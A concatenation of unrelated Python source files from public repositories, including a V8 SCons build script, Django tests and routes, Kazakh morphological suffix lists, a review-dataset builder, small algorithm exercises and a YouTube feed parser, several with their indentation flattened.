source_value = source.get(name + ':' + value, [])
if type(source_value) == dict:
result += self.GetRelevantSources(source_value)
else:
result += source_value
return sorted(result)
def AppendFlags(self, options, added):
if not added:
return
for (key, value) in added.iteritems():
if key.find(':') != -1:
self.AddRelevantSubFlags(options, { key: value })
else:
if not key in options:
options[key] = value
else:
prefix = options[key]
if isinstance(prefix, StringTypes): prefix = prefix.split()
options[key] = prefix + value
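  # Illustration (hypothetical values): appending {'CPPDEFINES': ['NDEBUG']} when
  # options already maps CPPDEFINES to a list simply extends that list, while a
  # conditional key such as 'mode:release' is expanded recursively against the
  # currently selected option values rather than stored verbatim.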
def ConfigureObject(self, env, input, **kw):
if (kw.has_key('CPPPATH') and env.has_key('CPPPATH')):
kw['CPPPATH'] += env['CPPPATH']
if self.options['library'] == 'static':
return env.StaticObject(input, **kw)
else:
return env.SharedObject(input, **kw)
def ApplyEnvOverrides(self, env):
if not self.env_overrides:
return
if type(env['ENV']) == DictType:
env['ENV'].update(**self.env_overrides)
else:
env['ENV'] = self.env_overrides
def PostprocessOptions(options):
# Adjust architecture if the simulator option has been set
if (options['simulator'] != 'none') and (options['arch'] != options['simulator']):
if 'arch' in ARGUMENTS:
# Print a warning if arch has explicitly been set
print "Warning: forcing architecture to match simulator (%s)" % options['simulator']
options['arch'] = options['simulator']
def ParseEnvOverrides(arg, imports):
# The environment overrides are in the format NAME0:value0,NAME1:value1,...
# The environment imports are in the format NAME0,NAME1,...
overrides = {}
for var in imports.split(','):
if var in os.environ:
overrides[var] = os.environ[var]
for override in arg.split(','):
pos = override.find(':')
if pos == -1:
continue
overrides[override[:pos].strip()] = override[pos+1:].strip()
return overrides
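# A minimal illustration (hypothetical values): combining both argument styles,
#   ParseEnvOverrides('CC:clang,CXX:clang++', 'HOME')
# returns {'CC': 'clang', 'CXX': 'clang++', 'HOME': os.environ['HOME']}
# whenever HOME is present in os.environ.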
def BuildSpecific(env, mode, env_overrides):
options = {'mode': mode}
for option in SIMPLE_OPTIONS:
options[option] = env[option]
PostprocessOptions(options)
context = BuildContext(options, env_overrides, samples=SplitList(env['sample']))
# Remove variables which can't be imported from the user's external
# environment into a construction environment.
user_environ = os.environ.copy()
try:
del user_environ['ENV']
except KeyError:
pass
library_flags = context.AddRelevantFlags(user_environ, LIBRARY_FLAGS)
v8_flags = context.AddRelevantFlags(library_flags, V8_EXTRA_FLAGS)
mksnapshot_flags = context.AddRelevantFlags(library_flags, MKSNAPSHOT_EXTRA_FLAGS)
dtoa_flags = context.AddRelevantFlags(library_flags, DTOA_EXTRA_FLAGS)
cctest_flags = context.AddRelevantFlags(v8_flags, CCTEST_EXTRA_FLAGS)
sample_flags = context.AddRelevantFlags(user_environ, SAMPLE_FLAGS)
d8_flags = context.AddRelevantFlags(library_flags, D8_FLAGS)
context.flags = {
'v8': v8_flags,
'mksnapshot': mksnapshot_flags,
'dtoa': dtoa_flags,
'cctest': cctest_flags,
'sample': sample_flags,
'd8': d8_flags
}
# Generate library base name.
target_id = mode
suffix = SUFFIXES[target_id]
library_name = 'v8' + suffix
version = GetVersion()
if context.options['soname'] == 'on':
# When building shared object with SONAME version the library name.
library_name += '-' + version
env['LIBRARY'] = library_name
# Generate library SONAME if required by the build.
if context.options['soname'] == 'on':
soname = GetSpecificSONAME()
if soname == '':
soname = 'lib' + library_name + '.so'
env['SONAME'] = soname
# Build the object files by invoking SCons recursively.
(object_files, shell_files, mksnapshot) = env.SConscript(
join('src', 'SConscript'),
build_dir=join('obj', target_id),
exports='context',
duplicate=False
)
context.mksnapshot_targets.append(mksnapshot)
# Link the object files into a library.
env.Replace(**context.flags['v8'])
context.ApplyEnvOverrides(env)
if context.options['library'] == 'static':
library = env.StaticLibrary(library_name, object_files)
else:
# There seems to be a glitch in the way scons decides where to put
# PDB files when compiling using MSVC so we specify it manually.
# This should not affect any other platforms.
pdb_name = library_name + '.dll.pdb'
library = env.SharedLibrary(library_name, object_files, PDB=pdb_name)
context.library_targets.append(library)
d8_env = Environment()
d8_env.Replace(**context.flags['d8'])
shell = d8_env.Program('d8' + suffix, object_files + shell_files)
context.d8_targets.append(shell)
for sample in context.samples:
sample_env = Environment(LIBRARY=library_name)
sample_env.Replace(**context.flags['sample'])
context.ApplyEnvOverrides(sample_env)
sample_object = sample_env.SConscript(
join('samples', 'SConscript'),
build_dir=join('obj', 'sample', sample, target_id),
exports='sample context',
duplicate=False
)
sample_name = sample + suffix
sample_program = sample_env.Program(sample_name, sample_object)
sample_env.Depends(sample_program, library)
context.sample_targets.append(sample_program)
cctest_program = env.SConscript(
join('test', 'cctest', 'SConscript'),
build_dir=join('obj', 'test', target_id),
exports='context object_files',
duplicate=False
)
context.cctest_targets.append(cctest_program)
return context
def Build():
opts = GetOptions()
env = Environment(options=opts)
Help(opts.GenerateHelpText(env))
VerifyOptions(env)
env_overrides = ParseEnvOverrides(env['env'], env['importenv'])
SourceSignatures(env['sourcesignatures'])
libraries = []
mksnapshots = []
cctests = []
samples = []
d8s = []
modes = SplitList(env['mode'])
for mode in modes:
context = BuildSpecific(env.Copy(), mode, env_overrides)
libraries += context.library_targets
mksnapshots += context.mksnapshot_targets
cctests += context.cctest_targets
samples += context.sample_targets
d8s += context.d8_targets
env.Alias('library', libraries)
env.Alias('mksnapshot', mksnapshots)
env.Alias('cctests', cctests)
env.Alias('sample', samples)
env.Alias('d8', d8s)
if env['sample']:
env.Default('sample')
else:
env.Default('library')
# We disable deprecation warnings because we need to be able to use
# env.Copy without getting warnings for compatibility with older
# version of scons. Also, there's a bug in some revisions that
# doesn't allow this flag to be set, so we swallow any exceptions.
# Lovely.
try:
SetOption('warn', 'no-deprecated')
except:
pass
Build()
# ---- dym0080/learn-django: /myproject/accounts/tests/test_view_signup.py ----
from django.urls import reverse, resolve
from django.contrib.auth.models import User
# from django.contrib.auth.forms import UserCreationForm
from django.test import TestCase
from ..views import signup
from ..forms import SignUpForm
class SignUpTests(TestCase):
def setUp(self):
url = reverse('signup')
self.response = self.client.get(url)
def test_signup_status_code(self):
self.assertEqual(self.response.status_code, 200)
def test_signup_url_resolves_signup_view(self):
view = resolve('/accounts/signup/')
self.assertEqual(view.func, signup)
def test_csrf(self):
self.assertContains(self.response, 'csrfmiddlewaretoken')
def test_contains_form(self):
form = self.response.context.get('form')
self.assertIsInstance(form, SignUpForm)
def test_form_inputs(self):
'''
The view must contain five inputs: csrf, username, email,
password1, password2
'''
self.assertContains(self.response, '<input', 5)
self.assertContains(self.response, 'type="text"', 1)
self.assertContains(self.response, 'type="email"', 1)
self.assertContains(self.response, 'type="password"', 2)
class SuccessfulSignUpTests(TestCase):
def setUp(self):
url = reverse('signup')
data = {
'username': 'john',
'email': 'john@doe.com',
'password1': 'abcdef123456',
'password2': 'abcdef123456'
}
self.response = self.client.post(url, data)
self.home_url = reverse('home')
def test_redirection(self):
'''
A valid form submission should redirect the user to the home page
'''
self.assertRedirects(self.response, self.home_url)
def test_user_creation(self):
self.assertTrue(User.objects.exists())
def test_user_authentication(self):
'''
Create a new request to an arbitrary page.
The resulting response should now have a `user` to its context,
after a successful sign up.
'''
response = self.client.get(self.home_url)
user = response.context.get('user')
self.assertTrue(user.is_authenticated)
class InvalidSignUpTests(TestCase):
def setUp(self):
url = reverse('signup')
self.response = self.client.post(url, {})
def test_signup_status_code(self):
'''
An invalid form submission should return to the same page
'''
self.assertEqual(self.response.status_code, 200)
def test_form_errors(self):
form = self.response.context.get('form')
self.assertTrue(form.errors)
def test_dont_create_user(self):
self.assertFalse(User.objects.exists())
# ---- constance-scherer/PLDAC_Recommandation_analyse_sous_titres: /utils/affichage.py ----
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pandas as pd
def get_hist(df, x_axis, y_axis, titre, colour, font_size=None, horizontal=False):
    if horizontal:
        hist = df.plot.barh(x=x_axis, y=y_axis, color=colour, title=titre, fontsize=font_size, edgecolor="none").get_figure()
    else:
        hist = df.plot.bar(x=x_axis, y=y_axis, color=colour, title=titre, fontsize=font_size, edgecolor="none").get_figure()
    path_fig = "img/" + titre + '.png'
    hist.savefig(path_fig, bbox_inches="tight")
# ---- 0xArt/PersonalSite: /mysite/blog/migrations/0015_auto_20180831_2354.py ----
# Generated by Django 2.0.6 on 2018-09-01 06:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0014_auto_20180831_2352'),
]
operations = [
migrations.AlterField(
model_name='post',
name='summary',
field=models.CharField(max_length=400),
),
]
# ---- nslam/jwsys: /courseSelection/urls.py ----
from django.conf.urls import url
from django.views.generic import RedirectView
from .views import student_views, instructor_views, manager_views, index_views
urlpatterns = [
url(r'^$', index_views.index),
# manager
url(r'^manager$', RedirectView.as_view(url='manager/index')),
url(r'^manager/index$', manager_views.show_manager),
url(r'^manager/curriculum$',manager_views.set_curriculum_demand),
url(r'^manager/curriculum/result$',manager_views.curriculum_demand_result),
url(r'^manager/manualselection$', manager_views.manual_selection),
url(r'^manager/selectiontime$', manager_views.set_time),
url(r'^manager/selectiontime/timeresult$', manager_views.time_result),
url(r'^manager/selectiontime/confirmresult$', manager_views.confirm_result),
url(r'^manager/setting$', manager_views.other_setting),
url(r'^manager/setting/result$', manager_views.other_setting_result),
url(r'^manager/manualselection/result$', manager_views.selection_result),
# instructor
url(r'^instructor$', RedirectView.as_view(url='instructor/index')),
url(r'^instructor/index$', instructor_views.index),
url(r'^instructor/studentlist$', instructor_views.studentlist),
# student
url(r'^student$', RedirectView.as_view(url='student/index')),
url(r'^student/index$', student_views.index),
url(r'^student/curriculum$', student_views.curriculum),
url(r'^student/selection$', student_views.selection),
url(r'^student/selection/drop$', student_views.dropcourse),
url(r'^student/selection/coursedetails$', student_views.coursedetails),
url(r'^student/selection/priority$', student_views.selectionpriority),
url(r'^student/selection/result$', student_views.selectionresult),
url(r'^student/schedule$', student_views.schedule),
]
# ---- borko81/python_scripts: /work_with_pythest/tests/test_math.py ----
import pytest
def test_one_plus_one():
assert 1 + 1 == 2
def test_one_plus_two():
a = 1
b = 2
c = 3
assert a + b == c
def test_division_by_zero():
with pytest.raises(ZeroDivisionError) as e:
num = 1 / 0
assert 'division' in str(e.value)
# ---- PavelPylypenko/kz_tagging: /rules.py ----
NNATENDS = ['шык', 'шы', 'пыр', 'мпыр', 'алар', 'ашыщ', 'лар', 'елер', 'ды', 'рдан', 'рлан', 'рсақ', 'қтар', 'ылар', 'ылык', 'нші', 'лік', 'сшы', 'пша', 'хана', 'ашы', 'ші', 'паз', 'лық', 'йлар', 'қсы', 'ылық', 'ндық', 'ім', 'ар', 'ас', 'кер', 'уші', 'шілер', 'рік', 'ктер', 'қша', 'пан', 'лшы', 'дыр', 'тыр', 'рған', 'қай', 'алар', 'ылар', 'ңғы', 'ылар', 'ырақ', 'тік', 'ңдар', 'лын', 'ншақ', 'най', 'қтар', 'гер', 'рлер', 'ылар', 'ңіз', 'зші', 'шлер', 'гер', 'рлер', 'пкер', 'рлер', 'лігі', 'тур', 'турлер', 'ші', 'ілер', 'ншық', 'ын', 'шілік', 'ылық', 'дар', 'лық', 'ылар', 'шы', 'тар', 'гер', 'герлер', 'лер', 'ханалар', 'ілеп', 'паз', 'ік', 'іктер', 'керткіш', 'ту', 'ірткі', 'еп', 'ептер', 'сіз', 'уас', 'керу', 'ім', 'імде', 'башы', 'елер', 'пенділер', 'бек', 'кқор', 'шіл', 'ктер', 'ағасы', 'сы', 'лар', 'улар', 'тау']
NNILENDS = ['мның', 'енің', 'рдың', 'дың']
NNBAENDS = ['да', 'те', 'та', 'нда', 'нде', 'ға', 'ге', 'қа', 'ке', 'на', 'не', 'а', 'е', 'тік', 'еге ырға', 'рға', 'йға', 'ыға', 'аға', 'шаға', 'сіз', 'мға', 'ға']
NNTAENDS = ['мды', 'ені', 'рды', 'ырды', 'тты', 'ңды', 'керту', 'қы']
NNDJAENDS = ['да', 'зға', 'рда', 'еде']
NNSHIENDS = ['дан', 'ден', 'тан', 'тен', 'нан', 'нен', 'здан', 'зда', 'еден', 'рдан']
NNKOENDS = ['бен', 'здар', 'ммен', 'емен', 'рдан', 'мен', 'лармен', 'пен', 'нен', 'рмен', 'тпен', 'ңге', 'менен', 'ммен', 'мен', 'тармен', 'ілермен', 'герлермен', 'басшылық', 'іпқону', 'пенен']
SUB_ONE_SUF = ('тар', 'тер', 'дар', 'дер', 'лар', 'лер')
SUB_PLURAL_SUFFS = ('ның', 'нің', 'дың', 'дін', 'тың', 'тің',
                    'ға', 'ге', 'қа', 'ке', 'а', 'е', 'на', 'не',
                    'ны', 'н', 'ні', 'ды', 'ді', 'ты', 'ті',
                    'да', 'де', 'нда', 'нде', 'та', 'те',
                    'дан', 'ден', 'тан', 'тен', 'нан', 'нен',
                    'мен', 'менен', 'бен', 'бенен', 'пен', 'пенен')
SUB_SUFFIXES = ('ғай', 'гей', 'гер', 'ғи', 'ғой', 'дас', 'дес', 'дік', 'дық', 'кер', 'кес', 'қай', 'қар', 'қи', 'қой', 'қор', 'лас', 'лес', 'ліқ', 'лық', 'ман', 'паз', 'пана', 'сақ', 'тас', 'тес', 'тік', 'тық', 'хана', 'ша', 'шақ', 'ше', 'шек', 'ші', 'шік', 'шы', 'шық', 'ақ', 'ба', 'бе', 'ғақ', 'ғаш', 'гек', 'гі', 'ғіш', 'ғы', 'ғыш', 'дақ', 'дек', 'ек', 'ік', 'ім', 'іс', 'іш', 'к', 'кі', 'кіш', 'қ', 'қаш', 'қы', 'қыш', 'лақ', 'лек', 'м', 'ма', 'мақ', 'ме', 'мек', 'па', 'пақ', 'пе', 'пек', 'с', 'тақ', 'тек', 'уік', 'уық', 'ш', 'ық', 'ым', 'ыс', 'ыш', 'герлік', 'гіштік', 'ғыштық', 'дастық', 'дестік', 'ділік', 'дылық', 'кеәтік', 'қорлық', 'ластық', 'лестік', 'лілік', 'лылық', 'паздық', 'сақтық', 'сіздік', 'сыздық', 'тастық', 'тестік', 'тілік', 'тылық', 'шақтық', 'шілдік', 'шілік', 'шылдық', 'шылық', 'жан', 'ке', 'қан', 'сымақ', 'тай', 'ш', 'ша', 'шақ', 'ше', 'шік', 'шық')
SUB_ONE_l1 = ['а', 'у', 'н']
SUB_ONE_l2 = ['ға', 'ге', 'қа', 'ке', 'на', 'не', 'ны', 'ні', 'ды', 'ді', 'ты', 'ті', 'да', 'де', 'та', 'те', ]
SUB_ONE_l3 = ['ның', 'нің', 'дың', 'дін', 'тың', 'тің', 'нда', 'нде', 'дан', 'ден', 'тан', 'тен', 'нан', 'нен', 'мен', 'бен', 'пен']
SUB_ONE_l5 = ['менен', 'бенен', 'пенен']
OBJ_SUFFIXES = ('ға', 'ге', 'қа', 'ке', 'а', 'е', 'на', 'не', 'ны', 'н', 'ні', 'ды', 'ді', 'ты', 'ті')
OBJ_ENDS = ('тар', 'тер', 'дар', 'дер', 'лар', 'лер')
PRED_A_STARTS = ('тұр', 'отыр', 'жатыр', 'жүр')
PRED_A_SUFFIXES = ('біз', 'бін', 'быз', 'бын', 'ды', 'міз', 'мін', 'мыз', 'мын', 'піз', 'пің', 'пыз', 'пын', 'сіз', 'сіздер', 'сіндер', 'сің', 'сыз', 'сыздар', 'сың', 'сыңдар', 'ті', 'ты')
PRED_A_ENDS = ('п', 'ып', 'іп')
PRED_B_SUFFIXES = ('ар', 'ер', 'ыр', 'ір', 'а', 'е', 'й', 'и')
PRED_B_SUFFIX_ENDS = ('біз', 'бін', 'быз', 'бын', 'ды', 'міз', 'мін', 'мыз', 'мын', 'піз', 'пің', 'пыз', 'пын', 'сіз', 'сіздер', 'сіндер', 'сің', 'сыз', 'сыздар', 'сың', 'сыңдар', 'ті', 'ты')
PRED_C_SUFFIXES = ('ар', 'ер', 'ыр', 'ір')
PRED_C_POSS_SUFFIXES = ('', 'біз', 'бін', 'быз', 'бын', 'ды', 'міз', 'мін', 'мыз', 'мын', 'піз', 'пің', 'пыз', 'пын', 'сіз', 'сіздер', 'сіндер', 'сің', 'сыз', 'сыздар', 'сың', 'сыңдар', 'ті', 'ты')
PRED_C_ADD = ('еді', 'е')
PRED_D_ADD = ('еді', 'екен')
PRED_D_POSS_SUFFIXES = ('біз', 'бін', 'быз', 'бын', 'ды', 'міз', 'мін', 'мыз', 'мын', 'піз', 'пің', 'пыз', 'пын', 'сіз', 'сіздер', 'сіндер', 'сің', 'сыз', 'сыздар', 'сың', 'сыңдар', 'ті', 'ты')
PRED_D_SUFFIXES = ('ді', 'дік', 'діқ', 'дім', 'дің', 'ды', 'дык', 'дық', 'дым', 'дың', 'қ', 'ті', 'тік', 'тім', 'тің', 'ты', 'тык', 'тық', 'тым', 'тың', 'а', 'ай', 'ал', 'ан', 'ар', 'арыс', 'ға', 'ғал', 'ғар', 'ғе', 'ге', 'гер', 'гі', 'гіз', 'гіздір', 'гіле', 'гір', 'гіт', 'ғы', 'ғыз', 'ғыздыр', 'ғызыл', 'ғыла', 'ғыр', 'ғыт', 'да', 'дан', 'дар', 'дас', 'дастыр', 'де', 'ден', 'дендір', 'дес', 'діг', 'дік', 'дір', 'діргіз', 'дық', 'дыр', 'дырғыз', 'дырыл', 'е', 'ей', 'ел', 'ен', 'ер', 'й', 'іг', 'іғ', 'ік', 'ікіс', 'іл', 'іла', 'ілде', 'ілу', 'імсіре', 'ін', 'індір', 'ініс', 'іну', 'іңкіре', 'ір', 'ірде', 'іре', 'ірей', 'іріс', 'ірке', 'іркен', 'ірқе', 'іс', 'ісу', 'іт', 'ке', 'кер', 'кіз', 'кіле', 'кір', 'қа', 'қал', 'қан', 'қар', 'қе', 'қур', 'қыз', 'қыла', 'қыла', 'қыр', 'л', 'ла', 'лан', 'ландыр', 'лас', 'ластыр', 'лат', 'ле', 'лен', 'лендір', 'лес', 'лестір', 'лет', 'ліг', 'лік', 'лікіс', 'лін', 'ліс', 'лқа', 'лу', 'лығ', 'лық', 'лын', 'лыс', 'мала', 'меле', 'мсіре', 'мсыра', 'н', 'ні', 'ніл', 'ніс', 'ныл', 'ныс', 'ңгіре', 'ңғыра', 'ңкіре', 'ңқыра', 'ңра', 'ңре', 'р', 'ра', 'ре', 'с', 'са', 'сан', 'се', 'сен', 'сет', 'сетіл', 'сі', 'сін', 'сіре', 'стір', 'стыр', 'сы', 'сын', 'сыра', 'т', 'та', 'тан', 'тандыр', 'тас', 'те', 'тен', 'тендір', 'тес', 'тік', 'ттыр', 'тығ', 'тығс', 'тығыс', 'тық', 'тыр', 'тырыл', 'ура', 'ші', 'шы', 'ығ', 'ығыс', 'ық', 'ықыс', 'ыл', 'ыла', 'ылда', 'ылу', 'ылыс', 'ымсыра', 'ын', 'ындыр', 'ыну', 'ыныс', 'ыр', 'ыра', 'ырай', 'ырқа', 'ырқан', 'ырла', 'ыс', 'ысу', 'ыт', 'азы', 'ақта', 'ал', 'ала', 'аңғыра', 'аура', 'бала', 'бе', 'беле', 'би', 'бі', 'бы', 'дала', 'ди', 'ді', 'ды', 'екте', 'ел', 'еңгіре', 'еуре', 'жи', 'жіре', 'жыра', 'зы', 'і', 'ін', 'ірей', 'іс', 'іт', 'қи', 'лі', 'лы', 'ма', 'мала', 'меле', 'ми', 'мсіре', 'мсыра', 'ңра', 'ңре', 'палапеле', 'пи', 'пі', 'пы', 'ра', 'ре', 'си', 'сіре', 'сый', 'сыра', 'т', 'ти', 'ті', 'ты', 'усіре', 'усыра', 'ши', 'ші', 'шы', 'ы', 'ын', 'ыра', 'ырай', 'ыс', 'ыт')
PRED_SUFFIXES = ('ді', 'дік', 'діқ', 'дім', 'дің', 'ды', 'дык', 'дық', 'дым', 'дың', 'қ', 'ті', 'тік', 'тім', 'тің', 'ты', 'тык', 'тық', 'тым', 'тың', 'а', 'ай', 'ал', 'ан', 'ар', 'арыс', 'ға', 'ғал', 'ғар', 'ғе', 'ге', 'гер', 'гі', 'гіз', 'гіздір', 'гіле', 'гір', 'гіт', 'ғы', 'ғыз', 'ғыздыр', 'ғызыл', 'ғыла', 'ғыр', 'ғыт', 'да', 'дан', 'дар', 'дас', 'дастыр', 'де', 'ден', 'дендір', 'дес', 'діг', 'дік', 'дір', 'діргіз', 'дық', 'дыр', 'дырғыз', 'дырыл', 'е', 'ей', 'ел', 'ен', 'ер', 'й', 'іг', 'іғ', 'ік', 'ікіс', 'іл', 'іла', 'ілде', 'ілу', 'імсіре', 'ін', 'індір', 'ініс', 'іну', 'іңкіре', 'ір', 'ірде', 'іре', 'ірей', 'іріс', 'ірке', 'іркен', 'ірқе', 'іс', 'ісу', 'іт', 'ке', 'кер', 'кіз', 'кіле', 'кір', 'қа', 'қал', 'қан', 'қар', 'қе', 'қур', 'қыз', 'қыла', 'қыла', 'қыр', 'л', 'ла', 'лан', 'ландыр', 'лас', 'ластыр', 'лат', 'ле', 'лен', 'лендір', 'лес', 'лестір', 'лет', 'ліг', 'лік', 'лікіс', 'лін', 'ліс', 'лқа', 'лу', 'лығ', 'лық', 'лын', 'лыс', 'мала', 'меле', 'мсіре', 'мсыра', 'н', 'ні', 'ніл', 'ніс', 'ныл', 'ныс', 'ңгіре', 'ңғыра', 'ңкіре', 'ңқыра', 'ңра', 'ңре', 'р', 'ра', 'ре', 'с', 'са', 'сан', 'се', 'сен', 'сет', 'сетіл', 'сі', 'сін', 'сіре', 'стір', 'стыр', 'сы', 'сын', 'сыра', 'т', 'та', 'тан', 'тандыр', 'тас', 'те', 'тен', 'тендір', 'тес', 'тік', 'ттыр', 'тығ', 'тығс', 'тығыс', 'тық', 'тыр', 'тырыл', 'ура', 'ші', 'шы', 'ығ', 'ығыс', 'ық', 'ықыс', 'ыл', 'ыла', 'ылда', 'ылу', 'ылыс', 'ымсыра', 'ын', 'ындыр', 'ыну', 'ыныс', 'ыр', 'ыра', 'ырай', 'ырқа', 'ырқан', 'ырла', 'ыс', 'ысу', 'ыт', 'азы', 'ақта', 'ал', 'ала', 'аңғыра', 'аура', 'бала', 'бе', 'беле', 'би', 'бі', 'бы', 'дала', 'ди', 'ді', 'ды', 'екте', 'ел', 'еңгіре', 'еуре', 'жи', 'жіре', 'жыра', 'зы', 'і', 'ін', 'ірей', 'іс', 'іт', 'қи', 'лі', 'лы', 'ма', 'мала', 'меле', 'ми', 'мсіре', 'мсыра', 'ңра', 'ңре', 'палапеле', 'пи', 'пі', 'пы', 'ра', 'ре', 'си', 'сіре', 'сый', 'сыра', 'т', 'ти', 'ті', 'ты', 'усіре', 'усыра', 'ши', 'ші', 'шы', 'ы', 'ын', 'ыра', 'ырай', 'ыс', 'ыт', 'ған', 'ген', 'қан', 'кен', 'қон', 'ға', 'ге', 'қа', 'ке', 'атын', 'етін', 'йтын', 'йтін')
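# A minimal sketch (assumed usage; the tagging logic itself lives elsewhere in
# the repo): tuples such as PRED_SUFFIXES are shaped to drop straight into
# str.endswith, which accepts a tuple of candidate suffixes, e.g.
#   def looks_like_predicate(token):
#       return token.endswith(PRED_SUFFIXES)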
# ---- Syhen/hmqf_crawler_hy: /tests/parser/test_lieshu.py ----
# -*- coding: utf-8 -*-
"""
create on 2017-11-27 上午11:15
author @heyao
"""
import json
from nose.tools import assert_list_equal, assert_is_instance, assert_dict_equal, assert_equal
from content_market.parser.lieshu import Lieshu
class TestLieshu(object):
def setUp(self):
self.lieshu = Lieshu()
    def teardown(self):
        pass
def test_chapter_list(self):
with open('parser/data/lieshu/book_detail.html', 'r') as f:
content = f.read().decode('utf-8')
with open('parser/data/lieshu/chapters.json', 'r') as f:
real_chapters = json.load(f)
url = 'http://www.lieshu.cc'
chapters = self.lieshu.parse_chapter_list(content, url)
assert_is_instance(chapters, type((i for i in (1,))))
assert_list_equal(list(chapters), real_chapters)
def test_chapter_content(self):
with open('parser/data/lieshu/chapter_content.html', 'r') as f:
content_page = f.read().decode('utf-8')
with open('parser/data/lieshu/chapter_content.txt', 'r') as f:
content = f.read().decode('utf-8')
assert_equal(content, self.lieshu.parse_content(content_page))
def test_book_detail(self):
with open('parser/data/lieshu/book_detail.html', 'r') as f:
content = f.read().decode('utf-8')
with open('parser/data/lieshu/book_detail.json', 'r') as f:
book_detail = json.load(f)
url = 'http://www.lieshu.cc/2/2732/'
info = self.lieshu.parse_detail(content, url)
assert_dict_equal(book_detail, dict(info))
# ---- sahilm142/imdb-reviews-analysis: /dl_code.py ----
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 7 11:30:32 2019
@author: Sahil
"""
import numpy as np
import pandas as pd
import csv
def create_dataset(folder_name,type_rev):
'''
Column names
0: Type of review from top 250s 1: TV 2: Movies
1: Serial no of type 0 in top 250
2: Rating of review
3: Review
4: Sentiment Score (1-4: Negative->0 and 7-10: Positive-> 1)
'''
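    # Example output row (hypothetical values): 1,12,9,"Loved every episode.",1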
for j in range(1,251):
for i in [1,2,3,4,7,8,9,10]:
try:
datas = open(folder_name+"/"+str(j)+"/"+str(i)+".txt","r")
df = pd.read_csv(datas,sep='\n',header=None)
#datas = open("Data/"+str(j)+"/summary/"+str(i)+".txt","r")
#df_summ = pd.read_csv(datas,sep='\n',header=None)
except:
print("Token {0}:{1}".format(j,i))
continue
with open(folder_name+'.csv', 'a') as csvfile:
k=0
while k<len(df):
try:
csv_writer = csv.writer(csvfile, delimiter=',')
if i<5:
csv_writer.writerow([type_rev,j,i,df[0][k],0])
else:
csv_writer.writerow([type_rev,j,i,df[0][k],1])
k+=1
except:
print("{0} {1} {2} ".format(j,i,len(df)))
break
# Review type 1: TV 2: MOVIES
create_dataset("tv_250",1)
create_dataset("movies_250",2)
data_tv = pd.read_csv("tv_250.csv",header=None,encoding="latin-1")
data_movies = pd.read_csv("movies_250.csv",header=None,encoding="latin-1")
data = pd.concat([data_tv, data_movies])
# Reviews
reviews = data.iloc[:,3].values
for i in range(len(reviews)):
with open("final_data/reviews.txt","a",encoding="latin-1") as f:
f.writelines(reviews[i]+"\n")
# Labels
labels = data.iloc[:,4].values
for i in range(len(labels)):
with open("final_data/labels.txt","a") as f:
f.writelines(labels[i]+"\n")
# ---- selbieh/Pizza: /pizza/orders/admin.py ----
from django.contrib import admin
from .models import orderPizzaItem,order
admin.site.register([orderPizzaItem,order])
# ---- gammaseeker/DSA_Python: /matrix/zero_matrix.py ----
def zero_matrix(matrix):
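    # O(1) extra space: the first row and first column double as markers recording
    # which rows/columns must be zeroed; row_zero/col_zero remember their own state.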
# Check if top row has 0
row_zero = False
for col in range(0, len(matrix[0])):
if matrix[0][col] == 0:
row_zero = True
# Check if first col has 0
col_zero = False
for row in range(0, len(matrix)):
if matrix[row][0] == 0:
col_zero = True
# Look for zeros and mark them in first row,col
if len(matrix) > 1 and len(matrix[0]) > 1:
for row in range(1, len(matrix)):
for col in range(1, len(matrix[0])):
if matrix[row][col] == 0:
matrix[0][col] = 0
matrix[row][0] = 0
# Insert the zeros
if len(matrix) > 1 and len(matrix[0]) > 1:
for row in range(1, len(matrix)):
for col in range(1, len(matrix[0])):
if matrix[0][col] == 0 or matrix[row][0] == 0:
matrix[row][col] = 0
if row_zero:
for col in range(0, len(matrix[0])):
matrix[0][col] = 0
if col_zero:
for row in range(0, len(matrix)):
matrix[row][0] = 0
test1 = [[1, 1, 1], [1, 0, 1], [1, 1, 1]]
test2 = [[0,1,2,0],[3,4,5,2],[1,3,1,5]]
zero_matrix(test1)
print(test1)
zero_matrix(test2)
print(test2)
# ---- neysene/project-euler: /src/pe0026.py ----
if __name__ == '__main__':
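    # Project Euler 26: find d < 1000 whose unit fraction 1/d has the longest
    # recurring decimal cycle. Long-division remainders are tracked in `a`; the
    # expansion starts repeating once a remainder recurs, so len(a) gauges the
    # cycle length.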
maxx, keep = 1, 3
for i in xrange(2, 1000):
num, denom, flag = 10, i, True
a = []
while flag:
k = num%denom
if k == 0:
break
elif k in a:
if len(a) > maxx:
maxx = len(a)
keep = i
break
else:
a.append(k)
num = (k) * 10
print keep
# ---- cborao/youtube-xml-parser: /youtube_parser.py ----
#!/usr/bin/python3
#
# Simple XML parser for YouTube XML channels
# César Borao Moratinos
#
# Based on "ytparser.py" code:
#
# Jesus M. Gonzalez-Barahona
# jgb @ gsyc.es
# SARO and SAT subjects (Universidad Rey Juan Carlos)
# 2020
#
# The input is a valid channel ID. The parser produces a HTML document in standard output, with
# the list of videos on the channel
#
from urllib.error import URLError
from xml.sax.handler import ContentHandler
from xml.sax import make_parser
import sys
import urllib.request
videos = ""
class YTHandler(ContentHandler):
def __init__(self):
self.inEntry = False
self.inContent = False
self.content = ""
self.title = ""
self.link = ""
def startElement(self, name, attrs):
if name == 'entry':
self.inEntry = True
elif self.inEntry:
if name == 'title':
self.inContent = True
elif name == 'link':
self.link = attrs.get('href')
def endElement(self, name):
global videos
if name == 'entry':
self.inEntry = False
videos = videos \
+ " <li><a href='" + self.link + "'>" \
+ self.title + "</a></li>\n"
elif self.inEntry:
if name == 'title':
self.title = self.content
self.content = ""
self.inContent = False
def characters(self, chars):
if self.inContent:
self.content = self.content + chars
# Loading parser and driver
Parser = make_parser()
Parser.setContentHandler(YTHandler())
# --- Main prog
if __name__ == "__main__":
PAGE = """
<!DOCTYPE html>
<html lang="en">
<body>
<h1>Youtube channel contents:</h1>
<ul>
{videos}
</ul>
</body>
</html>
"""
if len(sys.argv) < 2:
print("Usage: python youtube_parser.py <channel id>")
print(" <channel id>: The unique ID of a youtube channel")
sys.exit(1)
# Reading the channel's xml file
try:
xmlFile = urllib.request.urlopen('https://www.youtube.com/feeds/videos.xml?channel_id=' + sys.argv[1])
Parser.parse(xmlFile)
page = PAGE.format(videos=videos)
print(page)
except URLError:
print("Introduce a valid channel Id")
# ---- neel7h/engineering: /analyze/extensions/com.castsoftware.html5.2.0.8-funcrel/js_file_filters.py ----
'''
Created on 26 nov. 2014
@author: iboillon
'''
import os
import json
import re
import cast.analysers
from cast.application import open_source_file # @UnresolvedImport
import traceback
